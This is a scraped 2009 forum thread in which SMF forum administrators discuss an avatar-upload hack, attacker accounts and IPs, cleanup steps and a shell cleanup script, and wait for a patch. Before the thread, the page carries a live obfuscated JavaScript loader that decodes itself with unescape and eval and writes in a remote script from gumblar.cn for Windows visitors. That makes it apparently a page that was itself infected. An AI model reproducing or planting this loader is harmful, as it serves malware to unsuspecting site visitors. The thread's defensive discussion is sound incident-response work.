(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
 --></script>
<body>
Title: Re: Hacked, script injection
Post by: Filipina on May 15, 2009, 01:17:42 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

Ok thanks for the information. I did a search today of the main two user names being used in the attacks and the results are unbelievable. When you see the search results and site descriptions showing things like "poker" and "gaming" it must be too late for them. My registration will just remain closed until a patch comes out because I am not taking any chances. It is not only the infection itself, but I am sure Google will just blacklist your site once they crawl and find that mess. It is truly sad.
Title: Re: Hacked, script injection
Post by: Kindred on May 15, 2009, 01:35:29 AM
Actually, the statement is slightly incorrect.

uploading a clean set of files *WILL* help and will solve your immediate problems with the forum.  It will not, however, close any backdoors or other exploits that the hacker may have added. THOSE other files are the ones you need to delete.
Title: Re: Hacked, script injection
Post by: Jorin on May 15, 2009, 02:30:10 AM
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)
Title: Re: Hacked, script injection
Post by: crash56 on May 15, 2009, 05:43:11 AM
Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

They're working on it.  Kindred posted that they're working on a fix.  It's on page 8 of this thread. 

No ETA yet. 
Title: Re: Hacked, script injection
Post by: Jorin on May 15, 2009, 05:51:24 AM
Ah, thanks.  :)
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 15, 2009, 06:09:28 AM
Krisbarteo registered on my forum today,

Code: [Select]
krisbarteo - krisbarteo@gmail.com - 94.142.129.147 -  Today at 12:58:32

The "Stop Spammer" -mod marked all profile details as spammer, and stopped krisbarteo from completing the registration. So I can say that mod is a good choice for protecting your forums as well ;)

http://custom.simplemachines.org/mods/index.php?mod=1547

Some additional info:
The hostname of krisbarteo seems to be the same as IP,
and I have a gender option on registration, and krisbarteo selected male ;D
Title: Re: Hacked, script injection
Post by: agridoc on May 15, 2009, 06:54:34 AM
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded http://www.motobit.com/util/base64-decoder-encoder.asp (http://www.motobit.com/util/base64-decoder-encoder.asp).

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup each file PHP has to be opened and the injected code be deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.
Title: Re: Hacked, script injection
Post by: sponna on May 15, 2009, 02:32:24 PM
We got hit slightly differently it seems. The attacker managed to upload a file "attach.php" in the attachments directory together with the avatar exploit. He then created a htaccess file with a redirect to a file he either created or modified called readme_old. Somehow this combination created an iframe using our home page code but into which was called many different versions of drug selling stores. All of these urls were accessed from the attachments directory in the forum via the redirect in the htaccess file.

I'm still trying to work out what sequence of events lead to the compromise - but it was almost certainly via the avatar or attachment upload. What worries me is that we had "encrypt file extensions" enabled so not sure how he invoked the file remotely. For sure I'd like to catch up with him!

I only found one file (readme_old) with the base64 code so far.

Pretty crap situation, particularly as Google crawled the vast array of urls and indexed them - we knew something was wrong when our bandwidth went sky high.
Title: Re: Hacked, script injection
Post by: Samker on May 15, 2009, 04:13:26 PM
I also find "KrisBarteo" in Member Base but it's look like that he doesn't success to hack us... At least I don't have anything unusual with my SCForum.

Can somebody please also check (and verify) is everything OK with Forum??


http://www.SCforum.info (http://www.SCforum.info)


Thanks in Advance!

S.
Title: Re: Hacked, script injection
Post by: Sarge on May 15, 2009, 04:18:02 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.
Title: Re: Hacked, script injection
Post by: Dzonny on May 15, 2009, 04:23:27 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.
I Agree... ;)
Title: Re: Hacked, script injection
Post by: Samker on May 15, 2009, 04:32:36 PM
Thank you guys...  :D

I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

I have tight settings (normal for Security Forum which I run) maybe I could help other with protections... I mean we could compare settings and find differences between installed mods, enabled features etc. ??

Best Regards,

S.

Title: Re: Hacked, script injection
Post by: agridoc on May 15, 2009, 05:06:14 PM
Can somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.
Title: Re: Hacked, script injection
Post by: Samker on May 15, 2009, 05:21:46 PM
Can somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.

I was already make a double check of all mentioned things and everything seem Ok.

Thanks for reply.
Title: Re: Hacked, script injection
Post by: M-DVD on May 15, 2009, 05:53:32 PM
3.- There is another problem, how the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480


THANKS Agafonov, without your info, I never could find the trick  >:(

How the value of theme_dir appeared in smf_themes table - is the main question.

The guy is brillant. I found the way, just because already knew that exists and search in the site.

I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

Perhaps because the guy has been busy :P
Title: Re: Hacked, script injection
Post by: Tiribulus on May 15, 2009, 05:59:07 PM
<<< I found the way, just because already knew that exists and search in the site. >>>

How would ya like to a be a sterling citizen and share that with us? :)
Title: Re: Hacked, script injection
Post by: M-DVD on May 15, 2009, 06:09:23 PM
<<< I found the way, just because already knew that exists and search in the site. >>>

How would ya like to a be a sterling citizen and share that with us? :)

No problem XD

I have found how to make the hack. Now I'm trying replicate in SMF 2 and in other potential sites. Then I will make the fix, and say the fix.
Title: Re: Hacked, script injection
Post by: Kindred on May 15, 2009, 07:14:14 PM
Once again, be aware that the SMF development team is working very hard on putting together an official security patch.
Title: Re: Hacked, script injection
Post by: Sabre™ on May 15, 2009, 09:21:38 PM
Someone had a snoop at one of my sites a few weeks back, but since that site is invite only, no glory.
I don't allow attachments/images uploaded, but I'm about to open a music site where upcoming/unknown artists may attach their mp3 files for users to listen to.
So I look forward to your patch team :)
Title: Re: Hacked, script injection
Post by: stardx on May 16, 2009, 08:04:31 AM
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded http://www.motobit.com/util/base64-decoder-encoder.asp.

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup each file PHP has to be opened and the injected code be deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.

dunno if you found a script by now, i have done just that with a simple find/sed on shell routine recently.

Code: [Select]
nohup find /tmp/web13 -name "*.php" -exec grep "aWYoZnVuY3Rpb25" {} \; -print -exec clear.sh {} \; | grep tmp &

clear.sh:

Code: [Select]
#!/bin/bash

mkdir -p /tmp/backup`dirname $1`

sed -e '1d' $1 > /tmp/backup$1

mv $1 $1.hack 2>/dev/null

mv /tmp/clemensbackup$1 $1 2>/dev/null

you could even do it with "sed -i" command in one line, i had to copy/move all the files cause i did on a curlftpfs mounted device.
Title: Re: Hacked, script injection
Post by: crash56 on May 16, 2009, 08:37:39 AM
KrisBarteo tried to register at our forum this morning.  We had the IP banned, so he didn't get in. 

Many thanks to everyone here for all the excellent information, and HUGE thanks to our webhost (GC Solutions) for sending around an e-mail warning all the SMF users about this hacker.  We would not have know about this threat if it weren't for that e-mail. 

*phew*  Disaster averted. 

<Heads back to the forum to continue shoring up defenses>

Title: Re: Hacked, script injection
Post by: FataMorgana on May 16, 2009, 09:02:39 AM
SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

Yes, don't know how long exactly this issue is known but I discovered it just yesterday because my avatar disappeared... And the user krisbarteo allready registered some weeks ago!
I visit my admin page allmost every day so some warning could have prevented the being hacked on the way it happened now.
Title: Re: Hacked, script injection
Post by: WillyP on May 16, 2009, 09:51:37 AM

My forum showed no signs of the affliction... a wiki installation on the same domain errored out, thats how I knew there was a problem.

What do you mean by that ? He registered on my forum too with both of his nicknames. He only activated one of his accounts and uploaded the fake avatar containing that php code but I can't find anything wrong or weird in any other files (it's 4 a.m. here and I'm still searching). He was active for only 1 minute and 9 seconds.

Wouldn't it be safer for everyone if this topic would be in a member only board ? (I guess not ...just asking)

Meaning, the forum functioned fine, although I did not test every single item, it appeared to be working normally. This particular website also has an installation of WikkaWiki, which did not work. When I went to the wiki, instead of the wiki page, there was an error message. He did not register on the wiki, only on the SMF forum. However EVERY php file i looked at on the domain was infected with the "Eval (etc...)" code. EXCEPT the config files, which was set read only. I also had a few files infected that were unrelated to either the forum or the wiki. Uploading the avatar is only the first step in his evil plot ;), the code must then be activated. So step two is infecting the php files, which seemed to be done days later. Someone reported a large number of files uploaded to the server, apparently step three. I did not get these, I discovered the infection about nine hours after it occurred. Who knows what step four would be? World domination? ;)
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 09:55:38 AM
Who knows what step four would be?

Spam. Apparently that's the whole purpose.
Title: Re: Hacked, script injection
Post by: rthrash on May 16, 2009, 11:06:37 AM
Once again, be aware that the SMF development team is working very hard on putting together an official security patch.

I'm surprised that this hasn't been broadcast through the admin panel "Live from Simple Machines..." feed yet. Most site owners probably don't check back to the Main SMF site daily and every day that goes by is another chance for more exploits and unhappy forum owners. Not talking about the danger is borderline irresponsible at best. Your forum owners should have been warned IMO the day it was reported and verified, along with a temporary work around (disabling avatars/attachments).

It's a very destructive exploit: every PHP file is compromised even outside of SMF, and in our case every file with "log" in it anywhere was deleted including those named login, logout, blog, logo, etc. Didn't matter the filetype (images, css, php and html files were affected—they were trying to hide their tracks). On less secured systems, it would be possible to install a rootkit and require wiping a server completely including OS reinstall to be sure things are safe again.
Title: Re: Hacked, script injection
Post by: Samker on May 16, 2009, 11:03:04 AM
thanks to our webhost (GC Solutions) for sending around an e-mail warning all the SMF users about this hacker.  We would not have know about this threat if it weren't for that e-mail. 

SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

I agree that would be great help...

Don't know is that possible before releasing new patched version??

 
Title: Re: Hacked, script injection
Post by: Filipina on May 16, 2009, 12:05:28 PM
I spent about 5 hours last night trying to contact SMF websites that showed the hacker user names on search. If they had any activity at all I signed up just to let them know. I seems unbelievable to me that after this much time has gone by there is no real official warning, patch, news flash, anything official from SMF.

Of course there are threads here with people discussing it, but unless you get the warning out to SMF's users most of them are flying blind. More and more sites are being severely compromised or even destroyed every day. If SMF can send me a news flash in my package manager everytime a new MOD comes available, then I don't understand why at least a warning cannot go out?
Title: Re: Hacked, script injection
Post by: zaphodb777 on May 16, 2009, 12:36:45 PM
Okay, I am desperately looking for a sample of the URL used to execute this attack, and what, if anything is abnormal to SMF about it.

Why? So i can add a signature to ZB Block (http://www.spambotsecurity.com/zbblock.php) to stop it cold. I at least want to protect against everything that needs to be done after they upload the malevolent avatar.

From what I gather, it requires a null truncation (%00) on the filename given to "pop" the .gif/.jpg/.png extention off the top and leave the upload as a .php ? (If so ZB Block allready knows this attack).

Since I am not a user of SMF myself, I could use any input regarding the adding of signatures to ZB Block that would help wrap SMF in a layer of protection.

Zap :)
Title: Re: Hacked, script injection
Post by: respar on May 16, 2009, 01:16:49 PM
My site got hacked by krisbarteo too.  He or it registered an account probably about a week ago.  Yesterday I changed by theme to a dark background and noticed his avatar was just a white box, and thought that was weird.  Then my avatar disappeared and some attachments weren't showing up.  I checked my source code, and saw a bunch of spam after the <body> tag and new I had been hacked.  I had to go through all my php files and delete the base64 code at the top.

I'm wondering if this is just a bot, because my site is fairly new and doesn't have an active base, so I'm not sure why "krisbarteo" would waste his time on my site.  As far as attachments, can't we just check the box that checks the file extension against .php?  I just limit attachments with users with 25 posts or more, but I disabled avatars for now.
Title: Re: Hacked, script injection
Post by: rthrash on May 16, 2009, 02:07:40 PM
He takes the time because your site now provides a convenient source for installing other malware for anyone that visits with the right browser/OS/click combination.
Title: Re: Hacked, script injection
Post by: metallica48423 on May 16, 2009, 02:35:34 PM
Quote
SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

The reason for this change is twofold:
1.) The pattern of the last SMF exploits has been alterations of prior exploits pertaining to poisoned attachments and avatars.  Rather than close one small hole, we are opting to close the possibility of this type of attack coming up again.
2.) IE6 will pretty much run just about anything injected into an image blindly without thinking twice about it.  This could infect your computer (as others alluded to above).

If you've already experienced the hack, i reccommend virus scanning your computer as well.

Again, i'd suggest disabling your attachment and avatar uploads temporarily until the patch is out.  Everyone should also make sure there are no rows for themes in the themes table that should not exist.
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 02:43:23 PM
I also recommend disallowing members to select themes. This can be done at Admin > Themes and Layout.
Title: Re: Hacked, script injection
Post by: Filipina on May 16, 2009, 02:48:03 PM
Thanks you. Does it make any difference if we are one of the those that changed the upload path for user-uploaded avatars out of the attachment's folder? Just curious if this will make any difference on applying the patch or how useful it will be. Thanks.
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 16, 2009, 02:56:05 PM
My entire forum is gone. That hacker got into my forum and just as I was deleting him, the forum disappeared

http://www.brokenarrowspeacepipe.com/forum2/

I have tried to restore the back up file through the cpanel  but I still cannot get the forum to come online


Is my only option to rebuild from scratch?
Title: Re: Hacked, script injection
Post by: metallica48423 on May 16, 2009, 03:00:55 PM
You could download the "large upgrade" package from our downloads page and use that to completely refresh and overwrite (thus sanitizing) all of your forums files.  Just make sure to delete all the files starting with "upgrade".

However, any custom mod files and such -- php files that aren't part of the default distribution -- will need to be sanitized by hand.

Any such mods would also need to be reinstalled
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 16, 2009, 03:08:30 PM
thanks Metallica

That pretty much leaves me rebuilding it from scratch. I had alot of modifications added to the theme files I had used. Not to mention the mods added

geez, what a nightmare
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 03:11:09 PM
In general, after uploading the SMF upgrade package, you should verify every file that is not part of the SMF distribution; this includes verifying all avatars, attachments, custom theme files etc.
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 03:12:54 PM
Can anybody confirm or not whether disabling users to choose their own theme will stop this hack?

It's possible that disabling theme selection is enough, but I would disable all kinds of uploads as well, at least until the patch comes out.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 16, 2009, 03:20:04 PM
<<< also make sure there are no rows for themes in the themes table that should not exist.

I don't mean to sound dopey, but what SHOULD be there so we I (we) know when something is out of place. Near as I can tell this @$$hat hasn't gotten into my site, but I'm not sure what rows are supposed to be there in the first place. To me it doesn't look like anything out of place is there, but you guys would know better than I would.
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 03:23:56 PM
Sort by ID_THEME descending and look for ID_THEME = 32, as well as for any values (in the value column) that end with a \0 character (it usually looks like a black diamond with a question mark inside).
Title: Re: Hacked, script injection
Post by: zaphodb777 on May 16, 2009, 04:02:42 PM
One would have to wonder if just adding a delete command to the upload task, that would delete all *.php files in the upload directory would be good enough...

Or, perhaps upload to a directory other than the normal avatar directory, then have the whole of the directory copied into the accessible one, but only coping *.jpg, *.gif, and *.png files, and skipping pre-existing ones at the end of upload.

Good luck folks,
Zap
Title: Re: Hacked, script injection
Post by: Tiribulus on May 16, 2009, 04:03:10 PM
Sort by ID_THEME descending and look for ID_THEME = 32, as well as for any values (in the value column) that end with a \0 character (it usually looks like a black diamond with a question mark inside).

Mine looks clean. I've had it torqued down pretty good for quite a while, but I'm wondering if the fact that I never had user selectable themes enabled at all might be the clincher. Also have recaptcha, are you human, puzzle and clock mods along with stop spammer and Unrecognizable Form. Not to mention having the PHP engine disabled for avatar and attachment directories. Password protected docroot too. I also killed all the ip info that's come up with this guy on my router.
Title: Re: Hacked, script injection
Post by: Kindred on May 16, 2009, 04:16:50 PM
Zaphod,

The point is that we alreayd sanitize uploads and do not allow php files.   What this hacker is doing is uploading a .jpg file that contains php code...
Title: Re: Hacked, script injection
Post by: zaphodb777 on May 16, 2009, 04:36:42 PM
K, I thought they were using a null truncator (%00) to slice off the .jpg (or whatever) when it hit the filesystem.

Nevermind. Still hoping there is a record somewhere of the URL they use to launch this, and if there's anything in it that is unique enough it can be added as a hostile action to my pre-parser script.

Thanks,
Zap.
Title: Re: Hacked, script injection
Post by: crash56 on May 16, 2009, 04:46:21 PM
We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

I can't begin to imagine how much work this entails ... especially the 'debugging' process.  I know from working with some other automation that spotting, chasing down, and remedying the bugs can be both infuriating and the most time consuming portion of the process.  I appreciate all the effort that goes into coming up with a reliable, stable patch. 

As someone said earlier (I think it was JBlaze), I've got the three forums I run locked up tighter than a crab's ass.  Pre-banning KrisBarteo and his IP has gone a long way in terms of defenses.  As of this evening, he has tried to register at all three forums now, and has been turned away.  I can wait quite patiently for the patch.  ;) 

Title: Re: Hacked, script injection
Post by: Broken Arrow on May 16, 2009, 07:39:25 PM
I managed to restore most of my database. I have discovered that the hacker used a 2nd name:  stilusmagic

I don't know if that has been shared with you already but it's the same IP as the other hacker name

Title: Re: Hacked, script injection
Post by: ConquerorOfMankind on May 16, 2009, 07:51:12 PM
So avatars linked from other image hosters are still safe? Did I understand that correctly?


And has anyone planned to do legal actions against that hacker, i.e. make a criminal complaint at the local police station?
Title: Re: Hacked, script injection
Post by: Sarge on May 16, 2009, 08:02:11 PM
So avatars linked from other image hosters are still safe? Did I understand that correctly?

Yes, but uncheck "Download avatar at given URL" in Admin > Attachments and Avatars > Avatar Settings tab.

From the help text: "With this option enabled, the URL given by the user is accessed to download the avatar at that location. On success, the avatar will be treated as uploadable avatar." So I don't recommend enabling it.
Title: Re: Hacked, script injection
Post by: ConquerorOfMankind on May 16, 2009, 08:34:49 PM
Ok thanks. I hope there will be an update soon.

And is SMF 2.x concerned by that? What I have read before seems only to be 1.1.8.
Title: Re: Hacked, script injection
Post by: JBlaze on May 16, 2009, 08:41:55 PM
Ok thanks. I hope there will be an update soon.

And is SMF 2.x concerned by that? What I have read before seems only to be 1.1.8.

It is also a problem in 2.0 but so far I have not seen an infected 2.0 version. (knock on wood)
Title: Re: Hacked, script injection
Post by: metallica48423 on May 17, 2009, 01:14:58 AM
All three branches of SMF are currently affected by this
Title: Re: Hacked, script injection
Post by: Samker on May 17, 2009, 03:25:20 AM
I managed to restore most of my database. I have discovered that the hacker used a 2nd name:  stilusmagic

I don't know if that has been shared with you already but it's the same IP as the other hacker name




I have them also (blocked) in a member base but with diferent IP than krisbarteo 78.157.140.2 and this mail address: stilusmagic@googlemail.com

Just a info., so you can check and block this IP ASAP.  ;)
Title: Re: Hacked, script injection
Post by: agridoc on May 17, 2009, 03:43:59 AM
Thank you for the reply.  :)

It seems that I have to remember my old days  ;D

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.

dunno if you found a script by now, i have done just that with a simple find/sed on shell routine recently.

Code: [Select]
nohup find /tmp/web13 -name "*.php" -exec grep "aWYoZnVuY3Rpb25" {} ; -print -exec clear.sh {} ; | grep tmp &

clear.sh:

Code: [Select]
#!/bin/bash

mkdir -p /tmp/backup`dirname $1`

sed -e '1d' $1 > /tmp/backup$1

mv $1 $1.hack 2>/dev/null

mv /tmp/clemensbackup$1 $1 2>/dev/null

you could even do it with "sed -i" command in one line, i had to copy/move all the files cause i did on a curlftpfs mounted device.
Title: Re: Hacked, script injection
Post by: (.:Al-Pacino:.) on May 17, 2009, 05:07:03 AM
When you tip in Google the Word "krisbarteo"

You will becom more than 20 Sites of SMF Forums!!
Title: Re: Hacked, script injection
Post by: Samker on May 17, 2009, 05:55:13 AM
When you tip in Google the Word "krisbarteo"

You will becom more than 20 Sites of SMF Forums!!



I was find exactly 670 indexed entries, if we add some % of no indexed forums... it's obvious that this Exploit become worst with every new min.


Title: Re: Hacked, script injection
Post by: (.:Al-Pacino:.) on May 17, 2009, 07:15:01 AM
I hate this hacker  :-X

pls god protect all SMF Forums  O:)
Title: Re: Hacked, script injection
Post by: Dzonny on May 17, 2009, 08:06:38 AM
I hate this hacker  :-X

pls god protect all SMF Forums  O:)
Lol, God have nothing with that... :)
Title: Re: Hacked, script injection
Post by: rosey on May 17, 2009, 08:44:32 AM
ok so if my forum was hacked (thank god only ONE of my forums allowed uploadable avs!) and I installed a fresh install of SMF - is it safe now?  or do I have to still find that user and delete him?  and if so how do I figure out which user it is?

or can I just empty out the attachments directory and then their script won't run anymore?
Title: Re: Hacked, script injection
Post by: Dzonny on May 17, 2009, 08:46:02 AM
No, we still waiting for patch to be released...
Read this topic for info:
http://www.simplemachines.org/community/index.php?topic=309717.0
Title: Re: Hacked, script injection
Post by: thebofh on May 17, 2009, 10:46:32 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 17, 2009, 10:49:46 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)
And now to wait for a reply :P
Title: Re: Hacked, script injection
Post by: thebofh on May 17, 2009, 10:54:52 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)
And now to wait for a reply :P
I doubt if he has enough time in the day to reply to all his abusive emails, or even a fraction of them, what a tosspot! I'm sure it's some teenage scumbag Eastern European script kiddie who doesn't even understand what's he's doing apart from following instructions from a real hacker.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 17, 2009, 10:56:05 AM
I wasn't exactly serious there :P Didn't think he would respond...
Title: Re: Hacked, script injection
Post by: JoeB on May 17, 2009, 11:01:15 AM
My advice is to just:
IGNORE HIM
This kind of internet abusers are the lowest of the low and motley attention seekers & enjoy any replies however abusive they are
Don't give them their treat & just ignore them
Title: Re: Hacked, script injection
Post by: MrPhil on May 17, 2009, 11:43:24 AM
Unfortunately, most hackers these days are apparently working (for pay) for spammers, rather than for the thrill and attention. They're cyberterrorists and it would be good to shoot the lot of them. It will eventually come to the point where the Internet has to be handed over to national Post Offices and postage be charged for every packet transmitted. Once it's no longer free, it will not be nearly so lucrative to spam. A side benefit will be that it will be cheaper to buy a legit CD or DVD than to download a pirated copy, thus greatly reducing piracy. The only losers will be hobbyists who download large software projects.
Title: Re: Hacked, script injection (Ranges to Block)
Post by: zaphodb777 on May 17, 2009, 12:21:48 PM
Your friend (dripping sarcasm on the word "friend") krisbarteo has been seen in these IP blocks.

77.92.88.0 - 77.92.89.255 ... LIMT Group, Suspected RBN
78.129.202.0 - 78.129.203.255 ... LIMT Group, Suspected RBN
78.157.140.0 - 78.157.143.255 ... Known RBN block

It is appearing that this is a major incursion by the RBN (Russian Business Network).

God be with us all against the red menace.

Zap :(

P.S. There are several more ranges the RBN squirts out of. Sorry about tooting my own horn here, but ZB Block (http://www.spambotsecurity.com/zbblock.php) does block most of them. You might try it out for the time being, as it's GPL freeware.
Title: Re: Hacked, script injection
Post by: ellion on May 17, 2009, 12:54:49 PM
what do i need to do check my database for this hack?
Title: Re: Hacked, script injection
Post by: ellion on May 17, 2009, 01:12:18 PM
when i cleaned up my SMF installation i compressed the corrupt public_html directory and downloaded it. i was just going through it now to see how much damage had been done but it does not look like the hack has gotten into too many files. however i tried to rename the folder and i am being denied access to it. is it possible that this contains some kind of virus that is run when the files are open on my own computer?
Title: Re: Hacked, script injection
Post by: robone on May 17, 2009, 03:09:58 PM
I had both krisbarteo and stilusmagic try and register early in may but my spam protection got them.

However, I did get caught with SanyaKill in March (before Spam protection) who uploaded an avatar that somehow had C99shell as part of it. He/she then got stuck in and had some fun by adding links to all my php files. I have resolved this by restricting the uploading of avatars or attachments until a member has posted a number of times.

As a rule, I have automatically banned anything with a .ru in it. Sorry Russia
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 17, 2009, 03:47:55 PM
can someone tell me which mod stops these things the best? I had tried the Stop Spam mod but it messed up the members list and did not show any of the images it was supposed to. I unistalled it and the list returned to normal

I wouldn't contact this spam guy in any way. I made the mistake of sending out a mass email to alert people to the missing avatar problem before I came here and saw what was causing the problem. I had another window open with my site up and saw that my mass email alerted him to come to my site. He showed up as a member online and then in a matter of minutes my site crashed completely...right before my eyes. I don't know what this guy did but files just disappeared off the server.

Title: Re: Hacked, script injection
Post by: robone on May 17, 2009, 03:57:11 PM
He probably used C99shell. Do yourself a favour and look it up on google. Once they get it on your site, they can do things you would not believe. It was on my site as img.php in the attachments folder, and then once they were in the transfered it to my root directory. A friend had it on his site as dir.php. I was in such a hurry to delete, that I never checked the size, but looking it up elsewhere, its about 47,029 bytes.

Worth checking every now and again. I have been looking for something that will scan and compare the files you should have on the server and what is there at present.
Title: Re: Hacked, script injection
Post by: Broken Arrow on May 17, 2009, 04:09:25 PM
I looked it up robone.

I am not experienced enough to understand all the talk about codes and scripts. I was reading this site: http://www.webhostingtalk.com/showthread.php?p=4703619 and it all just went over my head. I have taught myself as I go over the past few years. Protecting my site from this kind of attack is out of my league
Title: Re: Hacked, script injection
Post by: Zero_Panzer on May 17, 2009, 05:28:51 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php
:( I found the same code in my main index file. So I've got to go through all of them to see whats wrong? Dur. Oh well. Better to know whats wrong rather than to go in blindfolded.
I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool What is repair_settings.php? (http://docs.simplemachines.org/index.php?topic=663)
Title: Re: Hacked, script injection
Post by: Niklas_ on May 18, 2009, 08:29:28 AM
Does anybody know what the Hack does?

It does spread in all the *.php files available but that can'nt really be what krisbarteo is up to, can it?
Do I have to tell my members that I infected their computer?
Did he use my Forum to distribute SPAM ?
Or did he just use my Forum to store 230MB of stuff in my /Themes/default/languages Folder?

Thank you
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 08:31:29 AM
The ultimate purpose seems to be linkspam... The hack adds loads of hidden links on your forum....
Title: Re: Hacked, script injection
Post by: JBlaze on May 18, 2009, 08:33:13 AM
So far, all we know as of now is that there is code injected into random, or seemingly random, php files. Also, there have been reports of some database tables getting injected as well.

I, personally, have not seen any spam or viruses etc. come from this attack, but that doesn't mean anything.

I'm sure there will be a detailed report on this once the security patch comes out, so keep your eyes peeled.
Title: Re: Hacked, script injection
Post by: rthrash on May 18, 2009, 09:07:37 AM
We had lots of files deleted, including those outside of the SMF install: anything with "log" contained in it including blog, login, logo, logout...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 18, 2009, 09:08:17 AM
Sounds like a pretty smart hacker, trying to cover up after himself.... ::)
Title: Re: Hacked, script injection
